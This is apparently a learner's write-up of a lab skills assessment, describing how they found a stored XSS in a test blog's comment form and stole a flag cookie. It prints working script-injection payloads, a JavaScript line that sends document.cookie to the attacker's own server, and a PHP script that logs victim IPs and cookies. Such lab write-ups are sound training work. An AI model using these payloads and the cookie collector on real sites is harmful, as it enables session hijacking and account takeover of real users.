Skills Assessment
Task
Access the /assessment directory on the server using the browser.
- Identify a user-input field that is vulnerable to an XSS vulnerability
- Find a working XSS payload that executes JavaScript code on the target’s browser
- Using the
Session Hijackingtechniques, try to steal the victim’s cookies, which should contain the flag
What is the value of the ‘flag’ cookie?
Attempt
By inspecting the website, I found the search from under /assessment and Comment, Name, Email, and Website forms under /assessment/index.php/2021/06/11/welcome-to-security-blog/. I made an educated guess that there’s a XSS vulnerability here. (actually the blog author name was xss lol)
So first I started running a php server:
php -S 0.0.0.0:9000
Here 0.0.0.0 means ‘listen on all network interfaces.’ It makes the server accessible from any network interface including localhost, LAN, or external connections.
Then tried the below payloads in the corresponding fields:
<script src="http://MyLocalIp:9000/comment"></script>
<script src="http://MyLocalIp:9000/name"></script>
<script src="http://MyLocalIp:9000/website"></script>
Also I entered [email protected] in the email field.
But this gave me an error ‘Please fill the required fields (name, email).’ I added "> to the name field and my php server got 10.129.50.92:35962 [404]: GET /website - No such file or directory.
(Seemed like the name field discarded <script> tag.)
Then I made (actually reused the one I made for the module) this .js file:
new Image().src='http://MyLocalIp:9000/sess_hijack.php?c='+document.cookie;
and this .php file:
<?php
if (isset($_GET['c'])) {
$list = explode(";", $_GET['c']);
foreach ($list as $key => $value) {
$cookie = urldecode($value);
$file = fopen("cookies.txt", "a+");
fputs($file, "Victim IP: {$_SERVER['REMOTE_ADDR']} | Cookie: {$cookie}\n");
fclose($file);
}
}
?>
Set them under /tmp/tmpserver where I was running the php server.
And I injected this xss payload in the Website field:
<script src="http://MyLocalIp:9000/steal-cookie.js"></script>
I got a cookie with the flag.